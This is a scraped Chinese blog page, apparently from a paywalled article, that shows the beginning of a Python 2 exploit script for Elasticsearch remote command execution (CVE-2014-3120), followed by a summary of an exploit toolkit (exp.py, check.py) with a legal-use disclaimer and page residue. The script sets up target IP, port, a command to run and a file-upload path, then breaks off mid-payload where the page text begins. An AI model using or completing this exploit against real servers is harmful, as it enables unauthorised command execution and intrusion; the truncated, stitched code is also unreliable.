#!/usr/bin/env python
# by heshang ha.cker@me.com
# -*- coding: utf-8 -*-
import httplib
import urllib,urllib2
import simplejson
import string
import sys
from optparse import OptionParser
print 'Elasticsearch ExpLoit By Heshang'
print ' 2014-06-23'
options = OptionParser(usage='%prog ip [port] [command]', description='elasticsearch command exec exploit(CVE-2014-3120)')
options.add_option('-p', '--port', type='int', default='9200',help='The elasticsearch port (default:9200)')
options.add_option('-c', '--cmd', type='str', default='whoami', help='command to test (default:whoami)')
options.add_option('-P', '--path',type='str', default='', help='Upload file\'s path')
def post(ip,port,exp):
ip=ip
port=port
path=''
exp=exp
data = {
"size": 1,
"query": {
"filtered": {
"query": {
"match_all": {}
elasticsearch 漏洞利用工具套装
ElasticSearch漏洞利用与研究工具
最新推荐文章于 2025-10-14 11:53:55 发布
本文介绍了ElasticSearch,一个基于Lucene的开源、分布式搜索引擎,强调其在云计算中的实时搜索、高稳定性及易用性。文章还提及了一个支持HTTP JSON数据索引的漏洞利用工具套装,包括exp.py和check.py,但警告读者仅限于合法的漏洞研究,避免非法使用,并提醒可能的法律责任。


最低0.47元/天 解锁文章
5737

被折叠的 条评论
为什么被折叠?



